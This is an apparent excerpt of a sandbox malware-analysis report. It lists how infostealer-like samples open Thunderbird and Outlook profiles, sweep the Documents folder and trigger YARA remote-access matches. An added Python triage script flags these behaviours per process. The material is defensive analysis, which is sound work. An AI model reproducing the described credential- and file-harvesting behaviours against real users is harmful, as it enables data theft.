Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 1081
Source: Yara match File source: 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR
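
The evidence lines above are raw per-event records: two droppers open the Thunderbird profiles.ini, d361f35322.exe also opens the Outlook MAPI profile key, and the injected RegAsm.exe host sweeps the Documents tree (1081 queries). The following is an added triage helper, not part of the original report or the sandbox's own tooling; it parses lines in exactly the layout shown above and aggregates them per process, so an analyst can separate mail-client profile access from bulk document enumeration. The labels, the enumeration threshold and the sample lines (copied from the evidence above) are assumptions for illustration.

```python
"""Per-process triage of "File opened / Key opened / Directory queried" lines
from a sandbox behaviour report (added example; thresholds are assumptions)."""
import re
from collections import defaultdict

# Non-greedy process path stops at the first recognised event keyword, so
# paths containing spaces still parse.
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?P<event>File opened|Key opened|Directory queried): (?P<target>.*)$"
)

# Locations that appear in the report lines (compared case-insensitively).
THUNDERBIRD_PROFILES = "\\thunderbird\\profiles.ini"
OUTLOOK_MAPI_PROFILES = "\\windows messaging subsystem\\profiles\\outlook"


def classify_target(event, target):
    """Map one event target to a coarse label, or None if uninteresting."""
    t = target.lower()
    if event == "File opened" and t.endswith(THUNDERBIRD_PROFILES):
        return "thunderbird_profiles"
    if event == "Key opened" and OUTLOOK_MAPI_PROFILES in t:
        return "outlook_mapi_profile"
    if event == "Directory queried" and "\\documents" in t:
        return "documents_enum"
    return None


def summarize(lines):
    """Aggregate report lines into {process_path: summary dict}."""
    out = defaultdict(lambda: {"mail_profiles": set(), "doc_dirs": set(),
                               "doc_queries": 0, "reported_total": None})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        proc, event, target = m.group("proc"), m.group("event"), m.group("target")
        s = out[proc]
        # The report folds repeated queries into a trailing "number of queries" line.
        if event == "Directory queried" and target.startswith("number of queries:"):
            s["reported_total"] = int(target.split(":", 1)[1])
            continue
        label = classify_target(event, target)
        if label in ("thunderbird_profiles", "outlook_mapi_profile"):
            s["mail_profiles"].add(label)
        elif label == "documents_enum":
            s["doc_dirs"].add(target)
            s["doc_queries"] += 1
    return dict(out)


def triage(summary, enum_threshold=100):
    """Return {process_path: [reasons]} for processes worth a closer look.

    enum_threshold is an assumed cut-off for "sweeping" directory enumeration;
    any mail-client profile access is reported unconditionally.
    """
    flagged = {}
    for proc, s in summary.items():
        reasons = []
        if s["mail_profiles"]:
            reasons.append("mail-client profile access: " + ", ".join(sorted(s["mail_profiles"])))
        total = s["reported_total"] if s["reported_total"] is not None else s["doc_queries"]
        if total >= enum_threshold:
            reasons.append(f"Documents enumeration: {total} queries over "
                           f"{len(s['doc_dirs'])} distinct paths seen")
        if reasons:
            flagged[proc] = reasons
    return flagged


# Constructed sample: a handful of lines copied from the report's evidence block.
SAMPLE = [
    r"Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 1081",
]

if __name__ == "__main__":
    for proc, reasons in triage(summarize(SAMPLE)).items():
        print(proc)
        for r in reasons:
            print("   -", r)
```

Running it on the sample flags d361f35322.exe and RageMP131.exe for mail-client profile access and RegAsm.exe for the 1081-query Documents sweep; feeding it the full evidence block instead of the sample gives the same per-process picture for the whole report.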

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 40.0.jok.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000000.2051081332.00000000007C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jok.exe PID: 8672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe, type: DROPPED
Source: Yara match File source: 00000024.00000003.2840876152.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839845792.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3354975509.0000000008152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3088709368.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3082656269.0000000007D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2840195887.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839878527.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8964, type: MEMORYSTR
Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY